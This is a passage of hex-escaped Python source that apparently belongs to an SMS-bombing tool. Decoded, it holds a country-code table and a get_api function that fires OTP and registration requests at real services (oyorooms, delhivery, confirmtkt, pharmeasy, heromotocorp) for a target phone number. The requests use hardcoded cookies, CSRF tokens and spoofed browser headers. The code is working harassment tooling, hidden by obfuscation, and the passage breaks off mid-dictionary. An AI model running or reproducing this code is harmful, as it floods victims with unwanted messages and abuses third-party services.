7\x2c\x27\x33\x39\x27\x3a\x20\x27\x49\x54\x27\x2c\x27\x32\x32\x35\x27\x3a\x20\x27\x43\x49\x27\x2c\x27\x38\x31\x27\x3a\x20\x27\x4a\x50\x27\x2c\x27\x39\x36\x32\x27\x3a\x20\x27\x4a\x4f\x27\x2c\x27\x32\x35\x34\x27\x3a\x20\x27\x4b\x45\x27\x2c\x27\x36\x38\x36\x27\x3a\x20\x27\x4b\x49\x27\x2c\x27\x33\x38\x33\x27\x3a\x20\x27\x58\x4b\x27\x2c\x27\x39\x36\x35\x27\x3a\x20\x27\x4b\x57\x27\x2c\x27\x39\x39\x36\x27\x3a\x20\x27\x4b\x47\x27\x2c\x27\x38\x35\x36\x27\x3a\x20\x27\x4c\x41\x27\x2c\x27\x33\x37\x31\x27\x3a\x20\x27\x4c\x56\x27\x2c\x27\x39\x36\x31\x27\x3a\x20\x27\x4c\x42\x27\x2c\x27\x32\x36\x36\x27\x3a\x20\x27\x4c\x53\x27\x2c\x27\x32\x33\x31\x27\x3a\x20\x27\x4c\x52\x27\x2c\x27\x32\x31\x38\x27\x3a\x20\x27\x4c\x59\x27\x2c\x27\x34\x32\x33\x27\x3a\x20\x27\x4c\x49\x27\x2c\x27\x33\x37\x30\x27\x3a\x20\x27\x4c\x54\x27\x2c\x27\x33\x35\x32\x27\x3a\x20\x27\x4c\x55\x27\x2c\x27\x38\x35\x33\x27\x3a\x20\x27\x4d\x4f\x27\x2c\x27\x33\x38\x39\x27\x3a\x20\x27\x4d\x4b\x27\x2c\x27\x32\x36\x31\x27\x3a\x20\x27\x4d\x47\x27\x2c\x27\x32\x36\x35\x27\x3a\x20\x27\x4d\x57\x27\x2c\x27\x36\x30\x27\x3a\x20\x27\x4d\x59\x27\x2c\x27\x39\x36\x30\x27\x3a\x20\x27\x4d\x56\x27\x2c\x27\x32\x32\x33\x27\x3a\x20\x27\x4d\x4c\x27\x2c\x27\x33\x35\x36\x27\x3a\x20\x27\x4d\x54\x27\x2c\x27\x36\x39\x32\x27\x3a\x20\x27\x4d\x48\x27\x2c\x27\x32\x32\x32\x27\x3a\x20\x27\x4d\x52\x27\x2c\x27\x32\x33\x30\x27\x3a\x20\x27\x4d\x55\x27\x2c\x27\x32\x36\x32\x27\x3a\x20\x27\x52\x45\x27\x2c\x27\x35\x32\x27\x3a\x20\x27\x4d\x58\x27\x2c\x27\x36\x39\x31\x27\x3a\x20\x27\x46\x4d\x27\x2c\x27\x33\x37\x33\x27\x3a\x20\x27\x4d\x44\x27\x2c\x27\x33\x37\x37\x27\x3a\x20\x27\x4d\x43\x27\x2c\x27\x39\x37\x36\x27\x3a\x20\x27\x4d\x4e\x27\x2c\x27\x33\x38\x32\x27\x3a\x20\x27\x4d\x45\x27\x2c\x27\x32\x31\x32\x27\x3a\x20\x27\x45\x48\x27\x2c\x27\x32\x35\x38\x27\x3a\x20\x27\x4d\x5a\x27\x2c\x27\x39\x35\x27\x3a\x20\x27\x4d\x4d\x27\x2c\x27\x32\x36\x34\x27\x3a\x20\x27\x4e\x41\x27\x2c\x27\x36\x37\x34\x27\x3a\x20\x27\x4e\x52\x27\x2c\x27\x39\x37\x37\x27\x3a\x20\x27\x4e\x50\x27\x2c\x27\x33\x31\x27\x3a\x20\x27\x4e\x4c\x27\x2c\x27\x36\x38\x37\x27\x3a\x20\x27\x4e\x43\x27\x2c\x27\x36\x34\x27\x3a\x20\x27\x4e\x5a\x27\x2c\x27\x35\x30\x35\x27\x3a\x20\x27\x4e\x49\x27\x2c\x27\x32\x32\x37\x27\x3a\x20\x27\x4e\x45\x27\x2c\x27\x32\x33\x34\x27\x3a\x20\x27\x4e\x47\x27\x2c\x27\x36\x38\x33\x27\x3a\x20\x27\x4e\x55\x27\x2c\x27\x38\x35\x30\x27\x3a\x20\x27\x4b\x50\x27\x2c\x27\x34\x37\x27\x3a\x20\x27\x53\x4a\x27\x2c\x27\x39\x36\x38\x27\x3a\x20\x27\x4f\x4d\x27\x2c\x27\x39\x32\x27\x3a\x20\x27\x50\x4b\x27\x2c\x27\x36\x38\x30\x27\x3a\x20\x27\x50\x57\x27\x2c\x27\x39\x37\x30\x27\x3a\x20\x27\x50\x53\x27\x2c\x27\x35\x30\x37\x27\x3a\x20\x27\x50\x41\x27\x2c\x27\x36\x37\x35\x27\x3a\x20\x27\x50\x47\x27\x2c\x27\x35\x39\x35\x27\x3a\x20\x27\x50\x59\x27\x2c\x27\x35\x31\x27\x3a\x20\x27\x50\x45\x27\x2c\x27\x36\x33\x27\x3a\x20\x27\x50\x48\x27\x2c\x27\x34\x38\x27\x3a\x20\x27\x50\x4c\x27\x2c\x27\x33\x35\x31\x27\x3a\x20\x27\x50\x54\x27\x2c\x27\x39\x37\x34\x27\x3a\x20\x27\x51\x41\x27\x2c\x27\x32\x34\x32\x27\x3a\x20\x27\x43\x47\x27\x2c\x27\x34\x30\x27\x3a\x20\x27\x52\x4f\x27\x2c\x27\x37\x27\x3a\x20\x27\x52\x55\x27\x2c\x27\x32\x35\x30\x27\x3a\x20\x27\x52\x57\x27\x2c\x27\x35\x39\x30\x27\x3a\x20\x27\x4d\x46\x27\x2c\x27\x32\x39\x30\x27\x3a\x20\x27\x53\x48\x27\x2c\x27\x35\x30\x38\x27\x3a\x20\x27\x50\x4d\x27\x2c\x27\x36\x38\x35\x27\x3a\x20\x27\x57\x53\x27\x2c\x27\x33\x37\x38\x27\x3a\x20\x27\x53\x4d\x27\x2c\x27\x32\x33\x39\x27\x3a\x20\x27\x53\x54\x27\x2c\x27\x39\x36\x36\x27\x3a\x20\x27\x53\x41\x27\x2c\x27\x32\x32\x31\x27\x3a\x20\x27\x53\x4e\x27\x2c\x27\x33\x38\x31\x27\x3a\x20\x27\x52\x53\x27\x2c\x27\x32\x34\x38\x27\x3a\x20\x27\x53\x43\x27\x2c\x27\x32\x33\x32\x27\x3a\x20\x27\x53\x4c\x27\x2c\x27\x36\x35\x27\x3a\x20\x27\x53\x47\x27\x2c\x27\x34\x32\x31\x27\x3a\x20\x27\x53\x4b\x27\x2c\x27\x33\x38\x36\x27\x3a\x20\x27\x53\x49\x27\x2c\x27\x36\x37\x37\x27\x3a\x20\x27\x53\x42\x27\x2c\x27\x32\x35\x32\x27\x3a\x20\x27\x53\x4f\x27\x2c\x27\x32\x37\x27\x3a\x20\x27\x5a\x41\x27\x2c\x27\x38\x32\x27\x3a\x20\x27\x4b\x52\x27\x2c\x27\x32\x31\x31\x27\x3a\x20\x27\x53\x53\x27\x2c\x27\x33\x34\x27\x3a\x20\x27\x45\x53\x27\x2c\x27\x39\x34\x27\x3a\x20\x27\x4c\x4b\x27\x2c\x27\x32\x34\x39\x27\x3a\x20\x27\x53\x44\x27\x2c\x27\x35\x39\x37\x27\x3a\x20\x27\x53\x52\x27\x2c\x27\x32\x36\x38\x27\x3a\x20\x27\x53\x5a\x27\x2c\x27\x34\x36\x27\x3a\x20\x27\x53\x45\x27\x2c\x27\x34\x31\x27\x3a\x20\x27\x43\x48\x27\x2c\x27\x39\x36\x33\x27\x3a\x20\x27\x53\x59\x27\x2c\x27\x38\x38\x36\x27\x3a\x20\x27\x54\x57\x27\x2c\x27\x39\x39\x32\x27\x3a\x20\x27\x54\x4a\x27\x2c\x27\x32\x35\x35\x27\x3a\x20\x27\x54\x5a\x27\x2c\x27\x36\x36\x27\x3a\x20\x27\x54\x48\x27\x2c\x27\x32\x32\x38\x27\x3a\x20\x27\x54\x47\x27\x2c\x27\x36\x39\x30\x27\x3a\x20\x27\x54\x4b\x27\x2c\x27\x36\x37\x36\x27\x3a\x20\x27\x54\x4f\x27\x2c\x27\x32\x31\x36\x27\x3a\x20\x27\x54\x4e\x27\x2c\x27\x39\x30\x27\x3a\x20\x27\x54\x52\x27\x2c\x27\x39\x39\x33\x27\x3a\x20\x27\x54\x4d\x27\x2c\x27\x36\x38\x38\x27\x3a\x20\x27\x54\x56\x27\x2c\x27\x32\x35\x36\x27\x3a\x20\x27\x55\x47\x27\x2c\x27\x33\x38\x30\x27\x3a\x20\x27\x55\x41\x27\x2c\x27\x39\x37\x31\x27\x3a\x20\x27\x41\x45\x27\x2c\x27\x34\x34\x27\x3a\x20\x27\x47\x42\x27\x2c\x27\x31\x27\x3a\x20\x27\x55\x53\x27\x2c\x27\x35\x39\x38\x27\x3a\x20\x27\x55\x59\x27\x2c\x27\x39\x39\x38\x27\x3a\x20\x27\x55\x5a\x27\x2c\x27\x36\x37\x38\x27\x3a\x20\x27\x56\x55\x27\x2c\x27\x33\x37\x39\x27\x3a\x20\x27\x56\x41\x27\x2c\x27\x35\x38\x27\x3a\x20\x27\x56\x45\x27\x2c\x27\x38\x34\x27\x3a\x20\x27\x56\x4e\x27\x2c\x27\x36\x38\x31\x27\x3a\x20\x27\x57\x46\x27\x2c\x27\x39\x36\x37\x27\x3a\x20\x27\x59\x45\x27\x2c\x27\x32\x36\x30\x27\x3a\x20\x27\x5a\x4d\x27\x2c\x27\x32\x36\x33\x27\x3a\x20\x27\x5a\x57\x27\x7d\x0a\x0a\x0a\x64\x65\x66\x20\x74\x65\x73\x74\x28\x29\x3a\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x74\x61\x72\x67\x65\x74\x2c\x20\x63\x6f\x75\x6e\x74\x65\x72\x2c\x20\x64\x65\x6c\x61\x79\x2c\x20\x63\x68\x2c\x20\x63\x63\x29\x0a\x0a\x64\x65\x66\x20\x67\x65\x74\x5f\x61\x70\x69\x28\x70\x6e\x2c\x6c\x69\x6d\x2c\x63\x63\x29\x3a\x0a\x20\x20\x20\x20\x63\x63\x3d\x73\x74\x72\x28\x63\x63\x29\x0a\x20\x20\x20\x20\x70\x6e\x3d\x73\x74\x72\x28\x70\x6e\x29\x0a\x20\x20\x20\x20\x6c\x69\x6d\x20\x3d\x20\x69\x6e\x74\x28\x6c\x69\x6d\x29\x0a\x20\x20\x20\x20\x75\x72\x6c\x20\x3d\x20\x5b\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x6f\x79\x6f\x72\x6f\x6f\x6d\x73\x2e\x63\x6f\x6d\x2f\x61\x70\x69\x2f\x70\x77\x61\x2f\x67\x65\x6e\x65\x72\x61\x74\x65\x6f\x74\x70\x3f\x63\x6f\x75\x6e\x74\x72\x79\x5f\x63\x6f\x64\x65\x3d\x25\x32\x42\x22\x20\x2b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x74\x72\x28\x63\x63\x29\x20\x2b\x20\x22\x26\x6e\x6f\x64\x3d\x34\x26\x70\x68\x6f\x6e\x65\x3d\x22\x20\x2b\x20\x70\x6e\x2c\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x64\x69\x72\x65\x63\x74\x2e\x64\x65\x6c\x68\x69\x76\x65\x72\x79\x2e\x63\x6f\x6d\x2f\x64\x65\x6c\x68\x69\x76\x65\x72\x79\x64\x69\x72\x65\x63\x74\x2f\x6f\x72\x64\x65\x72\x2f\x67\x65\x6e\x65\x72\x61\x74\x65\x2d\x6f\x74\x70\x3f\x70\x68\x6f\x6e\x65\x4e\x6f\x3d\x22\x20\x2b\x20\x70\x6e\x2c\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x73\x65\x63\x75\x72\x65\x64\x61\x70\x69\x2e\x63\x6f\x6e\x66\x69\x72\x6d\x74\x6b\x74\x2e\x63\x6f\x6d\x2f\x61\x70\x69\x2f\x70\x6c\x61\x74\x66\x6f\x72\x6d\x2f\x72\x65\x67\x69\x73\x74\x65\x72\x3f\x6d\x6f\x62\x69\x6c\x65\x4e\x75\x6d\x62\x65\x72\x3d\x22\x20\x2b\x20\x70\x6e\x5d\x0a\x20\x20\x20\x20\x74\x72\x79\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x6c\x69\x6d\x20\x3c\x20\x6c\x65\x6e\x28\x75\x72\x6c\x29\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x75\x72\x6c\x6c\x69\x62\x2e\x72\x65\x71\x75\x65\x73\x74\x2e\x75\x72\x6c\x6f\x70\x65\x6e\x28\x73\x74\x72\x28\x75\x72\x6c\x5b\x6c\x69\x6d\x5d\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x65\x78\x63\x65\x70\x74\x20\x28\x75\x72\x6c\x6c\x69\x62\x2e\x65\x72\x72\x6f\x72\x2e\x48\x54\x54\x50\x45\x72\x72\x6f\x72\x2c\x20\x75\x72\x6c\x6c\x69\x62\x2e\x65\x72\x72\x6f\x72\x2e\x55\x52\x4c\x45\x72\x72\x6f\x72\x29\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x46\x61\x6c\x73\x65\x0a\x20\x20\x20\x20\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x33\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x70\x68\x61\x72\x6d\x65\x61\x73\x79\x2e\x69\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x72\x76\x3a\x36\x35\x2e\x30\x29\x20\x47\x65\x63\x6b\x6f\x2f\x32\x30\x31\x30\x30\x31\x30\x31\x20\x46\x69\x72\x65\x66\x6f\x78\x2f\x36\x35\x2e\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x2a\x2f\x2a\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x55\x53\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x52\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x68\x61\x72\x6d\x65\x61\x73\x79\x2e\x69\x6e\x2f\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x33\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x22\x63\x6f\x6e\x74\x61\x63\x74\x4e\x75\x6d\x62\x65\x72\x22\x3a\x70\x6e\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x68\x61\x72\x6d\x65\x61\x73\x79\x2e\x69\x6e\x2f\x61\x70\x69\x2f\x61\x75\x74\x68\x2f\x72\x65\x71\x75\x65\x73\x74\x4f\x54\x50\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x6a\x73\x6f\x6e\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x2e\x73\x74\x61\x74\x75\x73\x5f\x63\x6f\x64\x65\x3d\x3d\x32\x30\x30\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x34\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x6f\x6f\x6b\x69\x65\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x67\x61\x27\x3a\x20\x27\x47\x41\x31\x2e\x32\x2e\x31\x32\x37\x33\x34\x36\x30\x36\x31\x30\x2e\x31\x35\x36\x31\x31\x39\x31\x35\x36\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x67\x69\x64\x27\x3a\x20\x27\x47\x41\x31\x2e\x32\x2e\x31\x37\x32\x35\x37\x34\x32\x39\x39\x2e\x31\x35\x36\x31\x31\x39\x31\x35\x36\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x67\x63\x6c\x5f\x61\x75\x27\x3a\x20\x27\x31\x2e\x31\x2e\x38\x33\x33\x35\x35\x36\x36\x36\x30\x2e\x31\x35\x36\x31\x31\x39\x31\x35\x36\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x66\x62\x70\x27\x3a\x20\x27\x66\x62\x2e\x31\x2e\x31\x35\x36\x31\x31\x39\x31\x35\x36\x38\x37\x30\x39\x2e\x31\x37\x30\x37\x37\x32\x32\x31\x32\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x50\x48\x50\x53\x45\x53\x53\x49\x44\x27\x3a\x20\x27\x6d\x35\x74\x61\x70\x37\x6e\x72\x37\x35\x62\x32\x65\x68\x63\x6e\x38\x75\x72\x32\x36\x31\x6f\x71\x38\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x77\x77\x77\x2e\x68\x65\x72\x6f\x6d\x6f\x74\x6f\x63\x6f\x72\x70\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x31\x32\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x2a\x2f\x2a\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x4f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x68\x65\x72\x6f\x6d\x6f\x74\x6f\x63\x6f\x72\x70\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x58\x2d\x52\x65\x71\x75\x65\x73\x74\x65\x64\x2d\x57\x69\x74\x68\x27\x3a\x20\x27\x58\x4d\x4c\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x53\x61\x76\x65\x2d\x44\x61\x74\x61\x27\x3a\x20\x27\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4c\x69\x6e\x75\x78\x3b\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x38\x2e\x31\x2e\x30\x3b\x20\x76\x69\x76\x6f\x20\x31\x37\x31\x38\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x35\x2e\x30\x2e\x33\x37\x37\x30\x2e\x31\x30\x31\x20\x4d\x6f\x62\x69\x6c\x65\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x3b\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x55\x54\x46\x2d\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x52\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x68\x65\x72\x6f\x6d\x6f\x74\x6f\x63\x6f\x72\x70\x2e\x63\x6f\x6d\x2f\x65\x6e\x2d\x69\x6e\x2f\x78\x70\x75\x6c\x73\x65\x32\x30\x30\x2f\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6d\x6f\x62\x69\x6c\x65\x5f\x6e\x6f\x27\x3a\x20\x70\x6e\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x72\x61\x6e\x64\x6f\x6d\x65\x27\x3a\x20\x27\x5a\x5a\x55\x43\x39\x57\x43\x43\x50\x33\x6c\x74\x73\x64\x2f\x4a\x6f\x71\x46\x65\x35\x48\x48\x65\x36\x57\x66\x4e\x5a\x66\x64\x51\x78\x71\x69\x39\x4f\x5a\x57\x76\x4b\x69\x73\x3d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6d\x6f\x62\x69\x6c\x65\x5f\x6e\x6f\x5f\x6f\x74\x70\x27\x3a\x20\x27\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x73\x72\x66\x27\x3a\x20\x27\x35\x32\x33\x62\x63\x33\x66\x61\x31\x38\x35\x37\x63\x34\x64\x66\x39\x35\x65\x34\x64\x32\x34\x62\x62\x64\x33\x36\x63\x36\x31\x62\x27\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x68\x65\x72\x6f\x6d\x6f\x74\x6f\x63\x6f\x72\x70\x2e\x63\x6f\x6d\x2f\x65\x6e\x2d\x69\x6e\x2f\x78\x70\x75\x6c\x73\x65\x32\x30\x30\x2f\x61\x6a\x61\x78\x5f\x64\x61\x74\x61\x2e\x70\x68\x70\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x63\x6f\x6f\x6b\x69\x65\x73\x3d\x63\x6f\x6f\x6b\x69\x65\x73\x2c\x20\x64\x61\x74\x61\x3d\x64\x61\x74\x61\x29\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x2e\x73\x74\x61\x74\x75\x73\x5f\x63\x6f\x64\x65\x3d\x3d\x32\x30\x30\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x35\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x6f\x6f\x6b\x69\x65\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6f\x6b\x69\x65\x3a\x5f\x67\x61\x27\x3a\x20\x27\x47\x41\x31\x2e\x32\x2e\x31\x34\x38\x33\x38\x38\x35\x33\x31\x34\x2e\x31\x35\x35\x39\x31\x35\x37\x36\x34\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x66\x62\x70\x27\x3a\x20\x27\x66\x62\x2e\x31\x2e\x31\x35\x35\x39\x31\x35\x37\x36\x34\x37\x31\x36\x31\x2e\x31\x39\x38\x39\x32\x30\x35\x31\x33\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x54\x69\x50\x4d\x69\x78\x27\x3a\x20\x27\x39\x31\x2e\x39\x39\x30\x39\x31\x38\x35\x32\x32\x36\x39\x36\x34\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x67\x63\x62\x5f\x74\x5f\x74\x72\x61\x63\x6b\x27\x3a\x20\x27\x53\x45\x4f\x20\x2d\x20\x47\x6f\x6f\x67\x6c\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x67\x63\x62\x5f\x74\x5f\x6b\x65\x79\x77\x6f\x72\x64\x27\x3a\x20\x27\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x67\x63\x62\x5f\x74\x5f\x6c\x5f\x75\x72\x6c\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x2f\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x67\x63\x62\x5f\x75\x74\x6d\x5f\x6d\x65\x64\x69\x75\x6d\x27\x3a\x20\x27\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x67\x63\x62\x5f\x75\x74\x6d\x5f\x63\x61\x6d\x70\x61\x69\x67\x6e\x27\x3a\x20\x27\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x53\x50\x2e\x4e\x45\x54\x5f\x53\x65\x73\x73\x69\x6f\x6e\x49\x64\x27\x3a\x20\x27\x69\x6f\x71\x6b\x65\x6b\x35\x6c\x62\x67\x76\x6c\x64\x6c\x71\x34\x69\x33\x63\x6d\x69\x6a\x63\x73\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x77\x65\x62\x5f\x61\x70\x70\x5f\x6c\x61\x6e\x64\x69\x6e\x67\x5f\x75\x74\x6d\x5f\x73\x6f\x75\x72\x63\x65\x27\x3a\x20\x27\x